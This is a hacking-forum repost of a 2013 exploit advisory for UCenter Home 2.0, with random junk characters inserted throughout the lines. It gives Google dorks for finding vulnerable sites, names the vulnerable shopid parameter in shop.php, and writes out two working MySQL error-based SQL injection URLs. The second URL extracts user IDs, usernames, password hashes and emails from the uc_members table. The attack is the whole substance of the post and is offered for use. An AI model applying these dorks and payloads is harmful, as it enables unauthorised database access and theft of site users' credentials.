找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2016|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: i3 Q2 N, Q7 o8 L. O__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
; J+ b# ?  R3 h; @$ x
% O8 M6 c7 k& \! F4 K                                 
- T$ O& ]( |0 O, q! \5 V( m3 F; ?
* C0 F5 l  \3 ]- D9 {" w*/ Author : KnocKout  - i  i# b3 s  F7 A. r0 S
. k: @& d% c1 d: ^1 k$ o' _
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  # {! W' v$ Q; ~* J* n

. m& ^5 G. U& c( X, m*/ Contact: knockoutr@msn.com  
. Z, n" z% V: q: _2 g9 q) b6 E' C. e# T$ a5 X: Z; ]1 K1 m
*/ Cyber-Warrior.org/CWKnocKout  + D% `% n8 O' W
' F1 G( ~$ g7 f  }! y( C
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ! @' X& V2 A! ?, E/ k

9 A) L! l4 ~: lScript : UCenter Home  5 N) Z  X0 i9 C1 E+ q7 r

$ d" o; B9 h; a9 w# P+ hVersion : 2.0  
8 A3 r' B& z+ h  i
/ U! A2 w& w% |! X$ f9 zScript HomePage : http://u.discuz.net/  
" e- H# B$ L' l# W- j; D. B
  Z9 d4 }0 n  `  J/ g__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  & i$ _, `, k9 Q" Y7 u

/ S. t. `  c: m6 T+ l6 M2 \/ s; fDork : Powered by UCenter inurl:shop.php?ac=view  
+ g6 l, R6 _* O8 M: b3 M! A2 X9 [' F5 N6 N  \* c2 r
Dork 2 : inurl:shop.php?ac=view&shopid=  
9 t7 i& J* C  R
6 ^2 Q4 _  _% A( C__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
% ~8 n5 Q$ z$ [1 L$ @7 x5 L1 S# V: o7 M$ w' g
Vuln file : Shop.php  
5 L3 u$ [1 j0 C$ t5 @, X  c2 Y
, F  r; \: `: F; c2 Z$ f' Lvalue's : (?)ac=view&shopid=  
& G/ o# a8 e6 R9 R9 j% @' V' c0 V6 |6 w; b  M1 D$ i: K: y# `
Vulnerable Style : SQL Injection (MySQL Error Based)  - a+ b9 h; S5 i" f7 {2 A

* B- j. }% f( D/ oNeed Metarials : Hex Conversion  ! r) n7 ]2 a- M  X4 v, W7 ^

. V8 ~& g- ?7 C' p__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  / U( ^4 x% q( L1 m
5 O/ I2 U. W- o3 |$ `6 F' j# V7 ~) j* N
Your Need victim Database name.   
; D9 w3 c' |1 o! A# d) F  C
5 T/ D, a9 F' X1 c, tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + |/ v+ S8 U2 p/ Y* j, q5 }

# Q+ d' V( X- N; k..  
: ~: g, ~( N: S$ X7 J7 j* i9 l! i; l7 I3 N: D6 O, W
DB : Okey.  : F0 ?, o& ]( L. L- s" U( I

* h  y: i8 e! B2 b" hyour edit DB `[TARGET DB NAME]`  - }( M' i9 P7 p$ n& E5 w4 X

/ d( h. X  _$ q% PExample : 'hiwir1_ucenter'  
$ _) ]3 y+ M% P: q* [5 n/ X, T/ G% I# }) s
Edit : Okey.  ( ~2 k/ J+ N- o5 ~. f; u

; H, K1 k+ T" l6 e" h/ {Your use Hex conversion. And edit Your SQL Injection Exploit..  7 j7 g5 F- e2 r/ y  R, N
' J. y8 C3 c  r6 ?# |: ~3 u$ o
   3 C7 ~. u* M8 c  Q

% A" ]4 {' W7 M( _# J9 QExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
0 T4 _8 `( ?. P! T% q, ]* X# o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表